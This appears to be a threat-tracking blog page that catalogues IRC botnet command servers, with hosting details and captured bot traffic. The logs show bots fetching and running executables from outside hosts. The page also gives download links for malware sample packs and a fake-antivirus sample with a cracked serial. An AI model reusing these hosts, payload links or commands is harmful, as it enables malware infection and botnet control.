Remote Host Port Number 204.45.66.114 6667 NICK {XPUSA427318} MODE ##key37## -ix PONG irc.priv8net.com USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA427318} -ix JOIN ##key37## mon3y MODE #admins -ix hosting infos: http://whois.domaintools.com/204.45.66.114
77.235.59.223(irc botnet hosted in Netherlands Amsterdam Eurovps)
Remote Host Port Number 195.122.131.16 80 77.235.59.223 4042 PASS google_cache2.tmp NICK n[USA|XP]248794 USER 1258 “” “TsGh” :1258 JOIN #cash# abc PONG 422 PRIVMSG #cash# :[Download]: Downloading File From: http://rapidshare.com/files/3610997420/up5.exe, To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe PRIVMSG #cash# :[Download]: Failed To Download File Reason: Unknown * The data identified by the following URL was then requested fromRead more...
174.34.185.206(irc botnet hosted in United States Nobis Technology Group Llc)
Remote Host Port Number 174.34.185.206 6667 NICK ComputerName88 USER ComputerName88 ComputerName88 ComputerName88 ComputerName88 ComputerName88 ComputerName88 JOIN #haktehworld PONG intrepid.il.us.SwiftIRC.net hosting infos: http://whois.domaintools.com/174.34.185.206
1.stipriz.tk(botnet hosted in Turkey Ankara Turk Telekomunikasyon Anonim Sirketi)
Remote Host Port Number 212.174.140.16 6667 NICK new[iRooT-XP-USA]645209 USER 4925 “” “TsGh” :4925 JOIN #abece WTF NICK [iRooT-XP-USA]454180 USER 4541 “” “TsGh” :4541 NICK [iRooT-XP-USA]930016 USER 9300 “” “TsGh” :9300 Now talking in #abece Topic On: [ #abece ] [ !p2p ] Topic By: [ Samuray ] Joins: [iRooT-W7-BEL]016772 [0167@d5152B53A.access.telenet.be] encore un flamand lol Joins:Read more...
gbin2.no-ip.info(4k gbot used by Bundy hf hecker hosted in Russian Federation Moscow Iqhost Ltd)
HF hecker using no-ip to host 4k bots Remote Host Port Number 193.106.172.77 1337 gBot gBot 64.62.181.43 80 Invisible Users: 2360 Operators: 2 operator(s) online Channels: 6 channels formed Clients: I have 2361 clients and 0 servers Local users: Current Local Users: 2361 Max: 5517 Global users: Current Global Users: 2361 Max: 4206 NICK n{USA|XP}zkvvxlyRead more...
Around 50mb malware samples
This package includes diferent types of malwares like TDL4 samples,ngrBot,spyeye,zeus,rats Have fun reversing files Download: http://adf.ly/24uTA
nathanisqueer.com(ngrBot hosted in Lithuania Vilnius Splius Uab)
Another big botnet using ngrBot Resolved : [nathanisqueer.com] To [77.79.9.5] Remote Host Port Number 213.251.170.52 80 77.79.9.5 80 77.79.9.5 1863 PASS ngrBot NICK n{US|XPa}ofxxist USER ofxxist 0 0 :ofxxist JOIN #ngr ngrbot PRIVMSG #ngr :[d=”http://77.79.9.5/crypt.exe” s=”225280 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataOcxaxo.exe” – Download retries: 0 Outgoing connection to remote server: 77.79.9.5 TCPRead more...
69.147.235.198(irc botnet hosted in United States Dallas Ubiquity Server Solutions Los Angeles)
Remote Host Port Number 69.147.235.198 6667 NICK ComputerName75 USER ComputerName75 ComputerName75 ComputerName75 ComputerName75 ComputerName75 ComputerName75 JOIN #haktehworld PONG intrepid.ca.us.SwiftIRC.net hosting infos: http://whois.domaintools.com/69.147.235.198
ha3.ha2.ha1.us(irc botnet hosted in Canada Globotech Communications)
IRC Botnet Host Malware: vnc.exe MD5: 0x962B127F456B05956DE254B0C68A767F IP: 72.10.160.166 / Host: ha3.ha2.ha1.us Location : CA, Canada NICK [00|USA|XP|SP2]-4374 USER yebse 0 0 :[00|USA|XP|SP2]-4374 JOIN #vnc USERHOST [00|USA|XP|SP2]-4374 MODE [00|USA|XP|SP2]-4374 +x Now talking in #vnc Topic On: [ #vnc ] [ Scanner VNC: ONline Link: http://www.fandefutebol.com.br/torcedores/vnc.exe] Topic By: [ Nogrod ] Modes On: [ #vnc ]Read more...
FastAntivirus2011 fake av
This is another sample from fake av used to infectd people asking them to download this antivirus wich is fake Sample was discovered by John Download link : http://www.multiupload.com/IGCWAUGNJR serial number: 2233-298080-3424(credits to xylitol for cracking it) Loader example by Xylitol: http://pastebin.com/qCxepgrp